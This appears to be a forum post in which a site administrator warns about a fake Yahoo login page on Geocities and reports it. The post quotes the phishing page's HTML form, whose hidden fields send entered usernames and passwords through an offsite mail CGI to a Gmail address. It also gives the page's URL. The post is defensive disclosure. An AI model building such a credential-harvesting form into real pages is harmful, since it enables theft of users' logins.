So one of my more observent users sent me this link today.
(click only at your own risk as I don't know what else they are doing on this page at the moment) http://www.geocities.com/ooopsss_104/
he noticed that he had fat fingered his Yahoo account information in the username/password fields but it seemed to accept his information anyway. So I checked it out and I found the following buried in the HTML code.
So someone has created a legit looking Geocities/Yahoo site, put a legit looking login screen on that site but has modified the script to send login information to an offsite gmail account and offloads that email process to another website based out of Queensland Australia.Code:<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="takinurname@gmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you_good/index.html">
This is bothersome since it looks completely legit, is on a legit website, and sends you to a legit looking error page.
You can "login" with fake credentials and it will still accept it, showing that they are not passing your credentials on to Yahoo to verify that they are real. That will be the next step in this scam I'm sure.
Just thought people would want to know. This site has been reported to Geocities/Yahoo already but it wouldn't hurt if a couple of others reported them also.
I have also sent an abuse message to Gmail explaining that they are being used in this scam also.
Reply With Quote